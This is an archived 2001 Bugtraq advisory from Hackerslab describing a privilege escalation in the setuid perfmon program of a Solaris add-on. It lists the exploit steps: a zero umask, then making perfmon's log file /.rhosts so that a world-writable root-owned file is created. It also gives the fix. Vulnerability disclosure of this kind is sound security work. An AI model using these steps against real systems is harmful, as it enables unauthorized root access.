Bugtraq mailing list archives
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
From: ±è¿ëÁØ KimYongJun <s96192 () CE HANNAM AC KR>
Date: Fri, 23 Mar 2001 17:11:52 +0900
==============================================================================
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
==============================================================================
File : /opt/JSParm/bin/perfmon
SYSTEM : Solaris 2.X
INFO :
parm is a program that displays system information .
parm is SunOS application. It's not included in Solaris basic package.
There is a vulneribility in perfmon program that you can create
any file with root privilege as follow:
$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &
Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts
following file is created in a second.
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
SOLUTION :
remove setuid permition, contact your vendor and get a patch.
==-------------------------------------------------------------------------------==
********
* ** ** *
* ** ** *
* ****** *
* ** ** * loveyou () hackerslab org
* ** ** * [ http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
Current thread:
- [ Hackerslab bug_paper ] SunOS application perfmon vulnerability ±è¿ëÁØ KimYongJun (Mar 23)